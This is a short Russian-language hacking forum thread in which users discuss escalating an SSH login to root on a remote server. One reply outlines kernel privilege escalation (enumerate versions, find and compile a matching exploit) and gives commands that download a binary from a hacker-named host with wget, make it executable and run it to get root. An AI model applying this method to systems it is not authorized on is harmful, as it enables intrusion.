Как рутануть ssh

[3amunyk]

Задумался вдруг, имея доступ к SSH тунелю, реально ли рутануть его?

 

[Dr.Lafa]

Реально, если на удалённой машине есть уязвимости/лазейки для повышения привелегий

 

[3amunyk]

По ядру искать уязвимости в метасплоите ?

 

[pr0phet]

По ядру искать уязвимости в метасплоите ?

Не в метасплойте. Узнай какой софт установлен - его версии - в том числе и ядро. Посмотри, есть ли gcc на серваке. Если есть - ищи подходящий сплойт - собирай - получай рута. Если нет gcc - поднимай на виртуалке подобную систему с подобным ядром - собирай у себя - заливай бинарник - получай рута. Ну это как пример. Если сплойт на перле - есесно тебе нужен интерпретатор на сервере. В общем логика такая.

 

[3amunyk]

собирай у себя - заливай бинарник

Вот тут не понял ) как бинарник соберу ?

 

[pr0phet]

Вот тут не понял ) как бинарник соберу ?

gcc super_sploit.c -o super_sploit
wget http://xackep.site/super_sploit
chmod +x super_sploit
./super_sploit
whoami
root

 

[z3RoTooL]

gcc super_sploit.c -o super_sploit
wget http://xackep.site/super_sploit
chmod +x super_sploit
./super_sploit
whoami
root

как в кино прям )

 

[3amunyk]

Блин, пацаны, душа ребята, тут реал чуть поглотил - так руки и не дошли - я ещё пофлужу в ветке - не кидайте юнца )